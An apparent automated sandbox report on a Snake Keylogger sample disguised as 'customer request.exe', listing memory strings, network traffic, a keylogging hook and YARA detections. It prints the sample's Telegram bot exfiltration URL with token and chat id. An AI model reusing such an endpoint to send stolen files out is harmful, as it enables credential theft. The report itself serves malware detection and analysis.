Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000000.00000002.1724779227.00000000058FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: customer request.exe, 00000008.00000002.4137608364.0000000002E72000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002F38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002F38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002F38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7347885220:AAFmOXgoc0UBDpYJA8OUR6HtUv-Uevo_Ttc/sendDocument?chat_id=6939
Source: customer request.exe, 00000008.00000002.4137608364.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D47000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D54000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D62000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002CE9000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D39000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D9E000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E2A000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E0F000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002D75000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E67000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: customer request.exe, 00000000.00000002.1722509797.0000000004D1D000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4133954704.000000000041B000.00000040.00000400.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000A.00000002.1763910283.0000000004B99000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000A.00000002.1763910283.0000000004C7B000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002D75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: customer request.exe, 00000008.00000002.4137608364.0000000002D47000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D54000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D62000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002CE9000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D39000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D9E000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E2A000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E0F000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E67000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: customer request.exe, tjvxuavKFXO.exe.0.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 62955 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62955
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62952
Source: unknown	Network traffic detected: HTTP traffic on port 62948 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 62952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 62946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62946
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62948
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:62946 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:62955 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: customer request.exe, HookManager.cs	.Net Code: EnsureSubscribedToGlobalKeyboardEvents
Source: tjvxuavKFXO.exe.0.dr, HookManager.cs	.Net Code: EnsureSubscribedToGlobalKeyboardEvents

System Summary

Malicious sample detected (through community Yara rule)

Source: 10.2.tjvxuavKFXO.exe.4b999b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.tjvxuavKFXO.exe.4b999b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.tjvxuavKFXO.exe.4b999b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.tjvxuavKFXO.exe.4b999b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 8.2.customer request.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.customer request.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 8.2.customer request.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.customer request.exe.4d3e188.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.customer request.exe.4d3e188.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.customer request.exe.4d3e188.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.customer request.exe.4d3e188.4.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.customer request.exe.4d1d568.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.customer request.exe.4d1d568.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.customer request.exe.4d1d568.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.customer request.exe.4d1d568.5.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 10.2.tjvxuavKFXO.exe.4b999b0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.tjvxuavKFXO.exe.4b999b0.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.tjvxuavKFXO.exe.4b999b0.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.tjvxuavKFXO.exe.4b999b0.1.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.customer request.exe.4d3e188.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.customer request.exe.4d3e188.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.customer request.exe.4d3e188.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.customer request.exe.4d3e188.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.customer request.exe.4d1d568.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.customer request.exe.4d1d568.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.customer request.exe.4d1d568.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.customer request.exe.4d1d568.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000008.00000002.4133954704.000000000040D000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000008.00000002.4133954704.000000000041B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0000000A.00000002.1763910283.0000000004B99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000A.00000002.1763910283.0000000004B99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.1722509797.0000000004D1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1722509797.0000000004D1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0000000A.00000002.1763910283.0000000004C7B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000A.00000002.1763910283.0000000004C7B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: customer request.exe PID: 6848, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: customer request.exe PID: 6848, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: customer request.exe PID: 1908, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: customer request.exe PID: 1908, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: tjvxuavKFXO.exe PID: 7348, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: tjvxuavKFXO.exe PID: 7348, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Source: C:\Users\user\Desktop\customer request.exe	Code function: 0_2_016DD6CC	0_2_016DD6CC
Source: C:\Users\user\Desktop\customer request.exe	Code function: 0_2_07A3E54B	0_2_07A3E54B
Source: C:\Users\user\Desktop\customer request.exe	Code function: 0_2_07A313E0	0_2_07A313E0
Source: C:\Users\user\Desktop\customer request.exe	Code function: 0_2_07A3A7AF	0_2_07A3A7AF
Source: C:\Users\user\Desktop\customer request.exe	Code function: 0_2_07A3A7C0	0_2_07A3A7C0
Source: C:\Users\user\Desktop\customer request.exe	Code function: 0_2_07A30766	0_2_07A30766
Source: C:\Users\user\Desktop\customer request.exe	Code function: 0_2_07A316BB	0_2_07A316BB
Source: C:\Users\user\Desktop\customer request.exe	Code function: 0_2_07A316C8	0_2_07A316C8
Source: C:\Users\user\Desktop\customer request.exe	Code function: 0_2_07A385C1	0_2_07A385C1
Source: C:\Users\user\Desktop\customer request.exe	Code function: 0_2_07A385D0	0_2_07A385D0
Source: C:\Users\user\Desktop\customer request.exe	Code function: 0_2_07A313D0	0_2_07A313D0
Source: C:\Users\user\Desktop\customer request.exe	Code function: 0_2_07A37210	0_2_07A37210
Source: C:\Users\user\Desktop\customer request.exe	Code function: 0_2_07A38161	0_2_07A38161
Source: C:\Users\user\Desktop\customer request.exe	Code function: 0_2_07A38E30	0_2_07A38E30
Source: C:\Users\user\Desktop\customer request.exe	Code function: 0_2_07A38E40	0_2_07A38E40
Source: C:\Users\user\Desktop\customer request.exe	Code function: 0_2_07A38A08	0_2_07A38A08
Source: C:\Users\user\Desktop\customer request.exe	Code function: 0_2_07A389F8	0_2_07A389F8
Source: C:\Users\user\Desktop\customer request.exe	Code function: 0_2_07A505F0	0_2_07A505F0
Source: C:\Users\user\Desktop\customer request.exe	Code function: 0_2_092AC908	0_2_092AC908
Source: C:\Users\user\Desktop\customer request.exe	Code function: 0_2_092A1520	0_2_092A1520
Source: C:\Users\user\Desktop\customer request.exe	Code function: 0_2_092ADFE0	0_2_092ADFE0
Source: C:\Users\user\Desktop\customer request.exe	Code function: 0_2_092A1F40	0_2_092A1F40
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_01216108	8_2_01216108
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_0121C190	8_2_0121C190
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_0121F007	8_2_0121F007
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_0121B328	8_2_0121B328
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_0121C470	8_2_0121C470
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_0121C752	8_2_0121C752
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_01219858	8_2_01219858
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_01216880	8_2_01216880
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_0121BBD2	8_2_0121BBD2
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_0121CA32	8_2_0121CA32
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_01214AD9	8_2_01214AD9
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_0121BEB2	8_2_0121BEB2
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_0121E528	8_2_0121E528
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_0121E517	8_2_0121E517
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_01213572	8_2_01213572
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_0121B4F2	8_2_0121B4F2
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056F8460	8_2_056F8460
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056F3870	8_2_056F3870
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056F7B70	8_2_056F7B70
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056F0D60	8_2_056F0D60
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056FED60	8_2_056FED60
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056FB940	8_2_056FB940
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056F0D51	8_2_056F0D51
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056FED50	8_2_056FED50
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056FB930	8_2_056FB930
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056FE908	8_2_056FE908
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056F0900	8_2_056F0900
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056FC1E0	8_2_056FC1E0
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056FC1F0	8_2_056FC1F0
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056F11C0	8_2_056F11C0
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056FF1A9	8_2_056FF1A9
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056FF1B8	8_2_056FF1B8
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056F11B0	8_2_056F11B0
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056FBD88	8_2_056FBD88
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056FBD98	8_2_056FBD98
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056F7D90	8_2_056F7D90
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056F3860	8_2_056F3860
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056FE049	8_2_056FE049
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056F0040	8_2_056F0040
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056FE058	8_2_056FE058
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056F0006	8_2_056F0006
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056FDC00	8_2_056FDC00
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056FB4E8	8_2_056FB4E8
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056FE8F8	8_2_056FE8F8
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056F08F0	8_2_056F08F0
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056FB4D7	8_2_056FB4D7
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056F04A0	8_2_056F04A0
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056FE4A0	8_2_056FE4A0
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056FE4B0	8_2_056FE4B0
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056F0490	8_2_056F0490
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056FD340	8_2_056FD340
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056FD350	8_2_056FD350
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056F73E8	8_2_056F73E8
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056FDBF1	8_2_056FDBF1
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056FD7A8	8_2_056FD7A8
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056FD798	8_2_056FD798
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056FFA68	8_2_056FFA68
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056FC648	8_2_056FC648
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056FFA59	8_2_056FFA59
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056FC638	8_2_056FC638
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056FF600	8_2_056FF600
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056FF610	8_2_056FF610
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056FCEEA	8_2_056FCEEA
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056FCEF8	8_2_056FCEF8
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056FCAA0	8_2_056FCAA0
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_0695B6E8	8_2_0695B6E8
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_06958608	8_2_06958608
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_0695AA58	8_2_0695AA58
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_0695D670	8_2_0695D670
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_0695C388	8_2_0695C388
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_06958BED	8_2_06958BED
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_0695B0A0	8_2_0695B0A0
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_0695A408	8_2_0695A408
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_0695D028	8_2_0695D028
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_06957050	8_2_06957050
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_069511A0	8_2_069511A0
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_0695C9D8	8_2_0695C9D8
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_0695BD38	8_2_0695BD38
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_0695F292	8_2_0695F292
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_06955EB8	8_2_06955EB8
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_0695F2A0	8_2_0695F2A0
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_0695B6D9	8_2_0695B6D9
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_06955EC8	8_2_06955EC8
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_06955618	8_2_06955618
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_06958602	8_2_06958602
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_0695560A	8_2_0695560A
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_0695AA48	8_2_0695AA48
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_06955A70	8_2_06955A70
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_06955A60	8_2_06955A60
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_0695D662	8_2_0695D662
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_069533B8	8_2_069533B8
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_069533A8	8_2_069533A8
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_06956BD0	8_2_06956BD0
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_06956BC1	8_2_06956BC1
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_0695A3F8	8_2_0695A3F8
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_06956312	8_2_06956312
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_06953730	8_2_06953730
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_06956320	8_2_06956320
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_06956778	8_2_06956778
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_0695C378	8_2_0695C378
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_0695676A	8_2_0695676A
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_06957497	8_2_06957497
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_06950498	8_2_06950498
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_0695B08F	8_2_0695B08F
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_06950488	8_2_06950488
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_069574A8	8_2_069574A8
